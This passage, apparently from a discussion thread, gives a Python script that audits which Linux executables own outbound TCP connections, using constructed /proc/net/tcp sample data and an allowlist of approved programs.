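The per-program visibility the comment above asks for can be approximated on Linux by auditing which executable owns each TCP socket with a remote peer. The following is an added example, not part of the original thread: it reports rather than blocks, the sample data, paths and allowlist are constructed, and the address decoding assumes a little-endian host.

```python
import os, socket, struct

# Constructed sample in /proc/net/tcp layout (not captured from a real host).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0A00000A:C350 0A0200C0:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 22222 1 0000000000000000 20 4 30 10 -1
   2: 0A00000A:C352 0B0200C0:0050 01 00000000:00000000 00:00000000 00000000  1000        0 33333 1 0000000000000000 20 4 30 10 -1
"""
# Constructed inode -> executable map; on a live system use socket_owners().
SAMPLE_OWNERS = {"22222": "/usr/bin/firefox", "33333": "/usr/local/bin/example-updater"}

def decode_addr(hex_addr):
    """'0A0200C0:01BB' -> ('192.0.2.10', 443); IPv4 as printed on little-endian hosts."""
    ip_hex, port_hex = hex_addr.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)

def socket_owners():
    """Map socket inode -> executable path by walking /proc/<pid>/fd (live Linux only)."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            for fd in os.listdir(f"/proc/{pid}/fd"):
                target = os.readlink(f"/proc/{pid}/fd/{fd}")
                if target.startswith("socket:["):
                    owners[target[8:-1]] = exe
        except OSError:  # process exited, or belongs to another user
            continue
    return owners

def unapproved_connections(proc_net_tcp, owners, allowlist):
    """Return (exe, remote_ip, remote_port) for remote TCP peers whose owner is not approved."""
    findings = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10 or fields[3] not in ("01", "02"):  # ESTABLISHED, SYN_SENT
            continue
        ip, port = decode_addr(fields[2])
        if ip.startswith("127."):  # loopback traffic never leaves the machine
            continue
        exe = owners.get(fields[9], "<unknown>")  # fields[9] is the socket inode
        if exe not in allowlist:
            findings.append((exe, ip, port))
    return findings

if __name__ == "__main__":
    print(unapproved_connections(SAMPLE_PROC_NET_TCP, SAMPLE_OWNERS, {"/usr/bin/firefox"}))
```

On a live system, pass the contents of `/proc/net/tcp` and the result of `socket_owners()`; run as root to see sockets owned by other users, and note that IPv6 sockets live in `/proc/net/tcp6` and are not covered here.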
